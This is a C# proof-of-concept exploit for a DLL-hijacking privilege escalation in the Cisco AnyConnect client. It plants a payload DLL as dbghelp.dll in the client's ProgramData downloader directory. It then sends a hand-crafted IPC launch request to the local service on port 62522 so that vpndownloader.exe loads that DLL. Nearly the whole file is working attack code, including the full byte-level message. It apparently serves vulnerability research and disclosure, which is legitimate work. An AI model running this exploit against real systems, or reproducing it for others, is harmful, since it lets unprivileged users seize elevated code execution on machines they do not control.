using System;
using System.IO;
using System.Net.Sockets;

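/// <summary>
/// Proof of concept: stages a payload DLL as <c>dbghelp.dll</c> in the AnyConnect
/// downloader temp directory, then asks the service listening on 127.0.0.1:62522
/// to launch <c>vpndownloader.exe</c> through its IPC protocol. The intent (not
/// verified by this code) is that the launched process resolves <c>dbghelp.dll</c>
/// from that staged directory, so the payload runs in its context.
/// </summary>
/// <remarks>
/// Everything is hard-coded for a 32-bit install under "C:\Program Files (x86)";
/// on another layout the launch request points at a file that does not exist.
/// The staging directory under ProgramData is presumably creatable by a standard
/// user (confirm the ACLs on the target system). Run only on systems you are
/// authorized to test.
/// </remarks>
public static class Poc {
	/// <summary>
	/// Pre-built IPC "launch" request. It is a 26-byte header (signature, header
	/// length 0x1A = 26, body length 0xE4 = 228, IPC response, user context,
	/// request id, return IPC object, message type, message id) followed by a body
	/// of type/length-prefixed fields. Note the header lengths are little-endian
	/// (0x1A,0x00) while the per-field lengths are big-endian (0x00,0x57 = 87).
	/// If any field is edited, both that field's length bytes and the body length
	/// in the header must be updated to match, otherwise the service will reject
	/// or misparse the message.
	/// </summary>
	private readonly static byte[] LAUNCH_COMMAND = new byte[] {
		// Signature
		0x4F, 0x43, 0x53, 0x43,
		// Message header length (26, little-endian)
		0x1A, 0x00,
		// Message body length (228, little-endian)
		0xE4, 0x00,
		// IPC response
		0xFF, 0xFF, 0xFF, 0xFF,
		// Message user context
		0x00, 0x00, 0x00, 0x00,
		// Request message identifier
		0x02, 0x00, 0x00, 0x00,
		// Return IPC object
		0x00, 0x00, 0x00, 0x00,
		// Message type
		0x01,
		// Message identifier
		0x02,
		// File path (87 bytes including the terminating NUL)
		// C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
		0x00, 0x01, // Type
		0x00, 0x57, // Length
		0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
		0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
		0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
		0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
		0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
		0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
		0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
		0x78, 0x65, 0x00,
		// Command line (command line should start with "CAC-" or other valid command)
		// CAC-doesnt-matter
		0x00, 0x02, // Type
		0x00, 0x12, // Length
		0x43, 0x41, 0x43, 0x2D, 0x64, 0x6F, 0x65, 0x73, 0x6E, 0x74, 0x2D, 0x6D,
		0x61, 0x74, 0x74, 0x65, 0x72, 0x00,
		// GUI desktop (not mandatory)
		// WinSta0\Default
		0x00, 0x04,
		0x00, 0x10,
		0x57, 0x69, 0x6E, 0x53, 0x74, 0x61, 0x30, 0x5C, 0x44, 0x65, 0x66, 0x61,
		0x75, 0x6C, 0x74, 0x00,
		// Use installed
		// False
		0x80, 0x05,
		0x00, 0x00,
		// Relocatable file path (same path as above, 87 bytes)
		// C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
		0x00, 0x06,
		0x00, 0x57,
		0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
		0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
		0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
		0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
		0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
		0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
		0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
		0x78, 0x65, 0x00
	};
	
	/// <summary>Directory the payload is staged into; created if missing.</summary>
	private readonly static string TARGET_DIRECTORY =
		"C:\\ProgramData\\Cisco\\Cisco AnyConnect Secure Mobility Client\\Temp\\Downloader";

	/// <summary>Name the payload is staged under (the DLL expected to be hijacked).</summary>
	private readonly static string TARGET_DLL =
		"dbghelp.dll";

	/// <summary>Payload DLL, read from the current working directory.</summary>
	private readonly static string PAYLOAD_DLL =
		"poc.dll";

	/// <summary>
	/// Entry point: stages the payload, then sends the launch request. Any failure
	/// (missing payload, connection refused, no reply within the read timeout) is
	/// written to stderr and reported through a non-zero exit code so scripted runs
	/// can tell success from failure.
	/// </summary>
	/// <param name="arguments">Unused.</param>
	public static void Main(string[] arguments) {
		try {
			StagePayload();
			SendLaunchRequest();
		}
		catch (Exception exception) {
			Console.Error.WriteLine(exception);
			Environment.ExitCode = 1;
		}
	}

	/// <summary>
	/// Creates <see cref="TARGET_DIRECTORY"/> if needed and copies the payload into it
	/// as <see cref="TARGET_DLL"/>, overwriting any stale copy from a previous run.
	/// </summary>
	/// <exception cref="FileNotFoundException">The payload is not in the current directory.</exception>
	private static void StagePayload() {
		// CreateDirectory is a no-op when the directory already exists.
		DirectoryInfo targetDirectory = Directory.CreateDirectory(TARGET_DIRECTORY);

		FileInfo payloadDll = new FileInfo(PAYLOAD_DLL);
		if (!payloadDll.Exists) {
			throw new FileNotFoundException(
				"Payload DLL missing from current directory", payloadDll.FullName);
		}

		payloadDll.CopyTo(Path.Combine(targetDirectory.FullName, TARGET_DLL), true);
	}

	/// <summary>
	/// Connects to the local service on port 62522, writes <see cref="LAUNCH_COMMAND"/>
	/// and waits for the first byte of the reply so the request is fully delivered
	/// before the socket is closed.
	/// </summary>
	/// <exception cref="SocketException">Nothing is listening on 127.0.0.1:62522.</exception>
	/// <exception cref="IOException">The service did not reply within 5 seconds.</exception>
	private static void SendLaunchRequest() {
		using (TcpClient tcpClient = new TcpClient("127.0.0.1", 62522))
		using (NetworkStream clientStream = tcpClient.GetStream()) {
			// Without a timeout a silent service would hang the PoC forever.
			clientStream.ReadTimeout = 5000;
			clientStream.Write(LAUNCH_COMMAND, 0, LAUNCH_COMMAND.Length);
			clientStream.Flush();

			// Only the first response byte is consumed; the reply is not parsed.
			if (clientStream.ReadByte() < 0) {
				Console.Error.WriteLine("Service closed the connection without replying");
			}
		}
	}
}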